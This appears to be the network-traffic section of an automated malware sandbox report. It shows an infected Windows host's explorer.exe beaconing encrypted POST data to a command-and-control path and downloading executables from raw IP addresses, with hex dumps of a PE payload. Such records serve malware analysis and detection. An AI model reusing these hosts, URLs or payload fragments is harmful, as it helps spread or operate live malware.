                                                                      Data Ascii: l<}ttuV+YeWuV}Eu}VcYQ0A3YUAPEPL3YY@]UVEtVvY^]UE3+]UQS3V9]uj^0utq6u A


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449743185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:29.589479923 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jyuvkhsnugkdc.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 136
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:29.589499950 CEST136OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 7b 5b c0 ec
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA ,[k,vu{[W1@J}kr3O>aFdq]oRGy
                                                                      May 26, 2024 10:28:30.521840096 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:30 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.449745185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:30.628217936 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://yukvxpqjtjfrjqw.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 294
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:30.628217936 CEST294OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5b 3c de a7
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu[<N^DMT"pvA+|hrL4|`?U]A5 !>Iqpep&Pbkm12-Dp!DgoY=t
                                                                      May 26, 2024 10:28:31.588572979 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:31 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.449747185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:31.624033928 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://lvfcajibsxtsk.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 201
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:31.624099016 CEST201OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2a 26 ce f0
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu*&rySg8IHAyjauZKvz:4)v/#=WRH;OSmPsQKm~8<"
                                                                      May 26, 2024 10:28:32.573925972 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:32 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.449748185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:32.680598974 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://dxmeirvuxixgqp.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 229
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:32.680614948 CEST229OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5f 29 e2 b5
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu_)WdS _`>4WW(\^rJG88N4Jr7k t(1nRP']z5KHVB'}ooutJ
                                                                      May 26, 2024 10:28:33.614326000 CEST190INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:33 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                                      Data Ascii: #\+X$mD2 *a


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.44975023.145.40.124802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:33.686253071 CEST164OUTGET /pintxi1lv.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: 23.145.40.124


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.449754185.235.137.54807932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:40.223802090 CEST205OUTGET /file/host_so.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Host: 185.235.137.54


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.449760185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:55.119710922 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ycpgoadxufkj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 238
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:55.119710922 CEST238OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 4d 2e ed f5
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vuM.NspuCx#[gcUeg0I__+ 7M}7;IdeK?~k*vD$("VV#Xp&\n
                                                                      May 26, 2024 10:28:56.046442986 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.449761185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:56.160957098 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://blkpeagecciexc.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 367
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:56.160981894 CEST367OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2f 1d e9 b8
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu/cT}|rzkF9y"1z iQn<ZgE08TrM"|VN`4thUVGZMojEa$ ]jB[8!+
                                                                      May 26, 2024 10:28:57.099667072 CEST210INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:56 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                                      Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.44976391.202.233.231802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:57.208102942 CEST184OUTGET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: 91.202.233.231
                                                                      May 26, 2024 10:28:57.889588118 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:57 GMT
                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                      Last-Modified: Sun, 26 May 2024 08:26:18 GMT
                                                                      ETag: "205e00-6195727a15e80"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 2121216
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-msdos-program
                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED]
                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*P @ @`J"pD<CODE `DATA& (@BSS-P6.idataJ"`$6@.tlsZ.rdataZ@P.reloc<\@P.rsrcDpD@P ^ @P
                                                                      May 26, 2024 10:28:57.890652895 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte
                                                                      May 26, 2024 10:28:57.893091917 CEST1236INData Raw: 00 90 84 10 40 00 01 04 57 6f 72 64 03 00 00 00 00 ff ff 00 00 90 98 10 40 00 01 08 43 61 72 64 69 6e 61 6c 05 00 00 00 00 ff ff ff ff 90 b0 10 40 00 10 05 49 6e 74 36 34 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 90 cc 10 40 00 04 06 44 6f
                                                                      Data Ascii: @Word@Cardinal@Int64@Double@@Currency@String@WideString@Variant@@OleVariantp@p@4@4@4@4@4@02@L2@2@
                                                                      May 26, 2024 10:28:57.895740032 CEST1236INData Raw: 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c
                                                                      Data Ascii: Jk;wb;uBCB)C{uH9?zk;u){*J${{+|$+su3;u3YZ]_^[SVW}sjh Vj;t#UIluhjP3_^[SVWUC
                                                                      May 26, 2024 10:28:57.895773888 CEST1236INData Raw: 5d 5f 5e 5b c3 90 53 56 57 83 c4 ec 8b f9 89 14 24 8d 98 ff 3f 00 00 81 e3 00 c0 ff ff 8b 34 24 03 f0 81 e6 00 c0 ff ff 3b de 73 5b 8b cf 8b d6 2b d3 8b c3 e8 99 fd ff ff 8d 4c 24 04 8b d7 b8 fc 55 49 00 e8 5d fa ff ff 8b 5c 24 04 85 db 74 1f 8d
                                                                      Data Ascii: ]_^[SVW$?4$;s[+L$UI]\$tL$T$&D$D$D$D$|$tT$UI3_^[U3Uhn@d2d"hUI9=MPIthUI.UIUI(VIxhj$VI=$V
                                                                      May 26, 2024 10:28:57.895807028 CEST1236INData Raw: 10 a1 24 56 49 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 ea fe ff ff 84 c0 75 17 a1 18 56 49 00 89 1d 18 56 49 00 8b 10 89 43 04 89 13 89 18 89 5a 04 5f 5e 5b c3 8d 40 00
                                                                      Data Ascii: $VI\[:CZ,<|uVIVICZ_^[@=VI~@=VI}UI+VI VI VI3 VI3VISVW<$L$(VI\$u3R;s)GGt$;s
                                                                      May 26, 2024 10:28:57.900947094 CEST1236INData Raw: 7c 08 f7 c2 03 00 00 80 74 0f c7 05 c8 55 49 00 0a 00 00 00 e9 b6 00 00 00 8b c6 2b c2 3b 50 08 74 0f c7 05 c8 55 49 00 0a 00 00 00 e9 9e 00 00 00 03 da 8b f0 e8 54 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 20 56 49 00 75 2c 29 1d 20 56
                                                                      Data Ascii: |tUI+;PtUIT;= VIu,) VIVI=VI<~3Et}UI7)xt8tx}UIP'UIE3ZYYdh$@=MPIthUI
                                                                      May 26, 2024 10:28:57.903676033 CEST1236INData Raw: 49 00 84 db 75 0d e8 bf 3a 00 00 8b 98 04 00 00 00 eb 0f 80 fb 18 77 0a 33 c0 8a c3 8a 98 48 20 49 00 33 c0 8a c3 8b d6 e8 ad ff ff ff 5e 5b c3 8b c0 83 e0 7f 8b 14 24 e9 a9 ff ff ff c3 50 52 51 e8 84 3a 00 00 83 b8 04 00 00 00 00 59 5a 58 75 01
                                                                      Data Ascii: Iu:w3H I3^[$PRQ:YZXu1@Sd:[VW|$1t+~9)@|9G1_^@S::3[@VW9wt/x*_^t
                                                                      May 26, 2024 10:28:57.903734922 CEST1236INData Raw: f6 89 32 5f 5e 5b c3 8d 40 00 b9 ff 00 00 00 e8 02 00 00 00 c3 90 53 50 81 f9 ff 00 00 00 76 05 b9 ff 00 00 00 8a 1a 42 84 db 74 06 40 88 18 49 75 f3 5a 29 d0 88 02 5b c3 90 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 56 57 89 c6
                                                                      Data Ascii: 2_^[@SPvBt@IuZ)[VW_^@VW11( (_^S1|M=S.@tytS/@taCk0@S=}FS.@t4t
                                                                      May 26, 2024 10:28:57.908634901 CEST1236INData Raw: 8b c0 53 8b d8 8b c3 e8 a6 00 00 00 8b c3 e8 3b f5 ff ff 5b c3 90 83 c0 d8 8b 00 c3 8b c0 84 d2 74 08 83 c4 f0 e8 70 03 00 00 84 d2 74 0f e8 bf 03 00 00 64 8f 05 00 00 00 00 83 c4 0c c3 e8 bf 03 00 00 84 d2 7e 05 e8 9e 03 00 00 c3 90 85 c0 74 07
                                                                      Data Ascii: S;[tptd~tQSVWK1QIYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!
                                                                      May 26, 2024 10:28:57.908677101 CEST1236INData Raw: 59 59 5a 58 c3 90 80 3d 28 20 49 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 50 49 00 5a c3 50 52 80 3d 28 20 49 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 50 49 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13 01 00
                                                                      Data Ascii: YYZX=( IvRTjjhPIZPR=( IvTjjhPIZXD$@8PHtnGPIT$L$9t7=, Iv)=( Iw L$PQXD$H0D$H=, Iv=( IwPD$RQPYZ


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.449765185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:59.750118971 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://bffxawywalbkr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 229
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:59.750152111 CEST229OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 55 0b ab b6
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA ,[k,vuU\;FGrwoL7ndsIGWruPVM6KQHE>8/2sEG/[/|aH=g:``WAA^
                                                                      May 26, 2024 10:29:00.700494051 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:29:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
